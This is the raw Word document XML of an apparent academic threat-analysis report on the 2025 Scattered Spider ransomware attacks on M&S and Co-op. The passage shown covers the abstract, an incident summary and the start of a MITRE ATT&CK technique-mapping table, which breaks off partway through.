            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127154 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AD108D9" w14:textId="2E579BD8" w:rsidR="006A15E7" w:rsidRDefault="006A15E7">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228127155" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Appendix B</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127155 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="300077B1" w14:textId="504D40FA" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="069AFDC4" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AD1141" w14:textId="7571EE95" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F60AC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDF6CD2" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6EF3FD" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D17ECC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8BE6C1" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167060CC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9F1862" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116D9EE8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0686E49E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4CCDC6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1093B92D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FAD71A6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1721068E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D9FE6E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5212D5DF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2CCD39" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FED9C1" w14:textId="37A3A63A" w:rsidR="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc228127094"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>TASK 1 — Strategic Threat Analysis: The M&amp;S &amp; Co-op UK Cyber Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2EDAB281" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4324DC" w14:textId="77777777" w:rsidR="00BF7D8D" w:rsidRPr="00BF7D8D" w:rsidRDefault="00BF7D8D" w:rsidP="00BF7D8D">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F81B569" w14:textId="1309DBD5" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc227971065"/>
      <w:bookmarkStart w:id="2" w:name="_Toc228127095"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2E19684B" w14:textId="34552A2C" w:rsidR="00E81640" w:rsidRDefault="009013F4" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009013F4">
        <w:t xml:space="preserve">In spring 2025, two of the most recognisable retailers in the United Kingdom - Marks &amp; Spencer PLC (M&amp;S) and the Co-operative Group Ltd (Co-op) - were victims of a ransomware attack by a financially motivated actor, tracked as Scattered Spider (alternate names UNC3944/Octo Tempest), using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009013F4">
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009013F4">
        <w:t xml:space="preserve"> Ransomware-as-a-Service (RaaS) tool. The attack took advantage of human factors via social engineering of third-party IT helpdesk staff, rather than any new vulnerability, and resulted in the encryption of M&amp;S's VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009013F4">
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009013F4">
        <w:t xml:space="preserve"> virtualisation platform and exfiltration of its customers' personally identifiable information (PII), with an estimated £300 million profit loss to M&amp;S. The attack was intercepted by Co-op in minutes and the ransomware never detonated, but M&amp;S experienced 46 days of ecommerce downtime and one of the largest retail outages in the UK's history. This report includes a chronology, mapping of twelve MITRE ATT&amp;CK techniques, root cause analysis, threat actor profiling, and strategic advice based on the NCSC and peer-reviewed literature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE0124" w14:textId="05E797C6" w:rsidR="00E81640" w:rsidRDefault="009013F4" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Toc227971066"/>
      <w:bookmarkStart w:id="4" w:name="_Toc228127096"/>
      <w:r w:rsidR="00000000">
        <w:lastRenderedPageBreak/>
        <w:t>1. Incident Summary and Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="743EAD13" w14:textId="22E6A51D" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>For the purposes of this article, the incidents are considered part of a singular campaign. They both share similar attribution, virtually identical initial-access techniques and a similar operational timeframe as confirmed by the UK Parliament's Business and Trade Sub-Committee hearing of 8 July 2025 (Norman and Elsey testimony).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23829A6E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646B306C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc227971067"/>
      <w:bookmarkStart w:id="6" w:name="_Toc228127097"/>
      <w:r>
        <w:t>1.1 Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7F2D7D7E" w14:textId="6915F485" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">In February-May 2025, Scattered Spider launched an advanced multi-stage campaign targeting leading UK retailers. The actor used social engineering to impersonate staff to trick the IT helpdesk to reset passwords, a technique that has previously been used (CISA AA23-320A, 2025). In the case of M&amp;S, the dwell time prior to ransomware detonation spanned about eight weeks, during which the actors "cracked" Active Directory (AD) passwords, conducted lateral movement in a virtualised environment, stole customer data and finally detonated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> ransomware on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> hosts on 24 April 2025. At Co-op, the initial access vector was identical, but automated Security Operations Centre (SOC) monitoring picked up on suspicious account activity within minutes, resulting in a swift response before encryption could be implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3437F3" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61530B6A" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc227971068"/>
      <w:bookmarkStart w:id="8" w:name="_Toc228127098"/>
      <w:r>
        <w:t>1.2 Chronological Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="49E9CCCE" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Table 1 presents the key events with dates and severity indicators (Red = critical; Amber = significant; Green = positive/recovery):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EB6B94" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AF9B95" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF070FA" w14:textId="3BBC87EC" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2B1C76" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EF9517" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2563EB"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc227971069"/>
      <w:bookmarkStart w:id="10" w:name="_Toc228127099"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Adversary TTP Mapping — MITRE ATT&amp;CK Enterprise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="19374C01" w14:textId="7B8461E7" w:rsidR="00E81640" w:rsidRDefault="00BF7D8D" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve">The table below links 12 key techniques used in the M&amp;S/Co-op campaign to the MITRE ATT&amp;CK Enterprise Matrix (v17). Sources include CISA advisory AA23-320A (updated July 2025), vendor reporting (Quorum Cyber, Prelude Security, Hack The Box, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t>Picus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF7D8D">
        <w:t xml:space="preserve"> Security, Barricade Cyber) and public reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B8220" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00E81640">
      <w:pPr>
        <w:spacing w:before="60"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200"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="4460"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E81640" w14:paraId="68BBE822" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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7A74A1CB" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ATT&amp;CK ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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676FD085" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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479F6E2F" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="446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4A52E22E" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Evidence &amp; Justification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="16375815"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BC55000" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1598 / T1566</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B9AB5D7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Phishing / Phishing for Info</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93EC887" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial Access</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89FD190" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Scattered Spider impersonated M&amp;S/Co-op employees to trick IT helpdesk (reportedly TCS) into issuing credential resets. Vishing (voice-phishing) calls are a signature technique. (CISA AA23-320A; HTB, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="58AD4518"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43ADE24" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1078.004</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168F3FA" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Valid Accounts: Cloud Accounts</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264A30C" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial Access / Persistence</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9CFEC69" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Compromised credentials used to authenticate into corporate VPN, Citrix, and cloud SSO portals as legitimate users, evading perimeter controls. (Prelude Security, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="4E98F765"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A409877" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1199</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B25D289" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Trusted Relationship</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50AD2A6" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial Access</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B3FEDF7" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>M&amp;S's third-party IT managed-service provider (TCS) was the first pivot point, illustrating supply-chain / trusted-relationship compromise. (Computer Weekly, May 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="3BAC5224"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D57AF49" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1003.003</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7EC7C4F" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OS Credential Dumping: NTDS</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6698EAF" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="2563EB"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential Access</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A939AF3" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attackers exfiltrated the Windows Active Directory </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file from a domain controller as early as February 2025, enabling offline hash cracking of all domain-user passwords. (CM-Alliance; Quorum Cyber, 2025)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E81640" w14:paraId="3F51D5CA"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5CD7FE33" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1136</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53FE389" w14:textId="77777777" w:rsidR="00E81640" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
